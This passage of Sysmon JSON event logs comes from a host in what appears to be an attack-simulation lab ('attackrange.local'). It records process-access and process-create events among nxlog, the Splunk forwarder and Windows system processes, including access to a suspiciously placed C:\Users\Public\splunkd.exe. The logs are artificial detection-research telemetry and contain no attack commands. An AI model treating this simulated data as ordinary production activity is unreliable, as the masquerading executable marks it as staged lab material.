C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:55.542","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6336,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:56.542\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:56.542","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6337,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:56.605\r\nProcessGuid: {E2A3D6B1-1238-5F25-0000-001077330900}\r\nProcessId: 2512\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:56:56.605","ProcessGuid":"{E2A3D6B1-1238-5F25-0000-001077330900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:56:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6338,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:56.604\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1238-5F25-0000-001077330900}\r\nTargetProcessId: 2512\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:56.604","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1238-5F25-0000-001077330900}","TargetProcessId":"2512","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6339,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:56.604\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1238-5F25-0000-001077330900}\r\nTargetProcessId: 2512\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:56.604","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1238-5F25-0000-001077330900}","TargetProcessId":"2512","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:56:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6340,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:56.604\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:56.604","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6341,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:56.604\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:56.604","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6342,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:56.604\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:56.604","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
